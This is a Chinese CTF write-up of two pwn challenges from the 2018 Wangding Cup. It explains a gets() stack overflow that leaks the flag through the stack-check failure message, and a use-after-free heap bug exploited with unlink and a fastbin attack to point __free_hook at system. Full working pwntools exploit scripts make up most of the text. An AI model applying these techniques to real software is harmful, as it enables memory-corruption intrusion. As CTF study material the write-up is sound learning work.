网鼎杯第一场 writeup
2018-12-15 本文已影响0人
Fish_o0O
0x01 Guess
-
程序功能
程序先将flag读入内存中,然后与用户输入相比较,程序会fork三次,在三次之后还猜不对则退出。 -
漏洞位置
在用户输入flag时,是用gets()进行输入,此处存在栈溢出
vul
-
利用思路
程序开了canary,存在栈溢出,并且把flag读到了内存中,我们可以考虑触发__stack_check_fail的异常处理链将内存中的flag打印出来,由于没有固定的地址,存在于栈中,所以要先leak栈地址,最后算出偏移将flag打印出来。
checksec
libc中有个environ指针指向存放环境变量的地址(栈上面),可通过此指针leak出栈地址。
environ
- my-exp
from pwn import *
local = 1
if local:
p = process('./GUESS')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
print 'time is up!'
def guess(flag):
flag = p64(0) * 37 + flag
p.recvuntil('Please type your guessing flag\n')
p.sendline(flag)
p.recvuntil('***: ')
return p.recvuntil(' ter')[:-4]
def debug():
print pidof(p)[0]
raw_input()
elf = ELF('./GUESS')
#step1 leak libc_base
gets_got = elf.got['gets']
success('gets_got => ' + hex(gets_got))
libc.address = u64(guess(p64(gets_got)) + '\x00' * 2) - libc.symbols['gets']
success('libc_base => ' + hex(libc.address))
#step2 leak environ_addr on the stack
environ_addr_ptr = libc.symbols['environ']
environ_addr= u64(guess(p64(environ_addr_ptr)) + '\x00' * 2)
success('environ_addr => ' + hex(environ_addr))
#step3 calc the offset of flag
print guess(p64(environ_addr - 0x168))
0x02 babyheap
-
程序功能
可申请最多10次的大小为0x20的chunk,最多可edit 3次chunk中的内容。 -
漏洞位置
free后不清空指针使.bss上存在Dangling ptr。
free
edit时不会检查是否已经free可造成uaf。
edit
- 利用思路
因为只能edit3次,所以每次edit都要很精确。先利用连在一起的fastbin中构造出一个unlink的结构,并顺带leak出heap_base。第一次edit,在堆上构造fastbin attack,使在数组中出现触发unink的指针。第二次edit,写自身为free_hook,第三次edit,将free_hook写为system。但是!我死活没有leak出libc基址,从而无法在第二次将自身写为free_hook,也刚好无法写到limit的位置,于是我想了个骚操作绕了一大圈(下见被三个引号注释的脚本):将本该存堆指针的地方重新伪造个0x31来做fastbin attack,这样我就可以通过add来修改limit甚至修改可以索引到的指针来搞很多事情,虽然我只需要将leak一下libc基址,然后再写自身就行了。当时做出来的时候我觉得我简直是个天才,然后看了别人的writeup发现我简直是个傻逼,既然已经unlink获得了写自己的指针,第二次edit的时候把指针下移,第三次edit就可以直接改limit了。(下见未注释的脚本)。
unlink时只需满足free堆块的size不在fastbin范围内,进行unlink的堆块的size无所谓。unlink后产生的指向自己上面的指针可以有大作用,不要想的太死板了。
- my-exp
from pwn import *
local = 1
if local:
p = process('./babyheap')
elf = ELF('./babyheap')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
else:
print 'Time is up!'
def add(index , content):
p.recvuntil('Choice:')
p.sendline('1')
p.recvuntil('Index:')
p.sendline(str(index))
p.recvuntil('Content:')
p.sendline(content)
p.recvuntil('Done!')
def edit(index , content):
p.recvuntil('Choice:')
p.sendline('2')
p.recvuntil('Index:')
p.sendline(str(index))
p.recvuntil('Content:')
p.sendline(content)
p.recvuntil('Done!')
def show(index):
p.recvuntil('Choice:')
p.sendline('3')
p.recvuntil('Index:')
p.sendline(str(index))
return p.recvuntil('Done!')[:-6]
def free(index):
p.recvuntil('Choice:')
p.sendline('4')
p.recvuntil('Index:')
p.sendline(str(index))
p.recvuntil('Done!')
def debug():
print pidof(p)[0]
raw_input()
free_got = elf.got['free']
success('free_got => ' + hex(free_got))
sleep(5)
#leak heap_base
ptr = 0x6020a8
fake_fd = ptr - 0x18
fake_bk = ptr - 0x10
fake_unlink = p64(0) + p64(0xb1) + p64(fake_fd) + p64(fake_bk)
fake_head = p64(0xb0) + p64(0x90)
add(9 , fake_unlink[:-1])
add(1 , '1' * 0x1f)
add(2 , '2' * 0x1f)
add(3 , '3' * 0x18 + '1')
add(4 , '4' * 0x19)
free(1)
free(2)
heap_base = u64(show(2).ljust(8 , '\x00')) - 0x30
success('heap_base => ' + hex(heap_base))
#unlink
fake_fastbin = heap_base + 0xb0
edit(2 , p64(fake_fastbin))
add(5 , '5' * 0x8)
add(6 , fake_head)
add(7 , '7' * 0x1f)
add(8 , '8' * 0x1f)
add(0 , '0' * 0x1f)
free(4)
#leak libc_base
payload = p64(free_got) + p64(0) * 2 + p64(0x6020a0)
edit(9 , payload[:-1])
libc.address = u64(show(6).ljust(8 , '\x00')) - libc.symbols['free']
success('libc_base => ' + hex(libc.address))
free_hook = libc.symbols['__free_hook']
success('free_hook => ' + hex(free_hook))
system_addr = libc.symbols['system']
success('system_addr => ' + hex(system_addr))
#break limit and change free_hook to system
payload2 = p64(0) + p64(free_hook) + p64(4)
edit(9 , payload2[:-1])
edit(9 , p64(system_addr))
#get shell
add(8 , '/bin/sh')
p.sendline('4')
p.sendline('8')
'''
#make a fastbin attack to .bss
free(8)
bss_fastbin = 0x602090
edit(8 , p64(bss_fastbin))
bss_head = p64(0) + p64(0x31) + p64(0)
edit(9 , bss_head[:-1])
add(6 , '/bin/sh')
#leak libc_base and change limit
payload = p64(free_got) + p64(bss_fastbin) + p64(4)
add(8 , payload)
libc.address = u64(show(8).ljust(8 , '\x00')) - libc.symbols['free']
success('libc_base => ' + hex(libc.address))
free_hook = libc.symbols['__free_hook']
success('free_hook => ' + hex(free_hook))
system_addr = libc.symbols['system']
success('system_addr => ' + hex(system_addr))
#change free_hook to system
payload = p64(heap_base + 0x130) + p64(0) + p64(0) + p64(free_hook)
edit(9 , payload[:-1])
edit(9 , p64(system_addr)[:-1])
p.sendline('4')
p.sendline('6')
'''
#debug()
p.interactive()
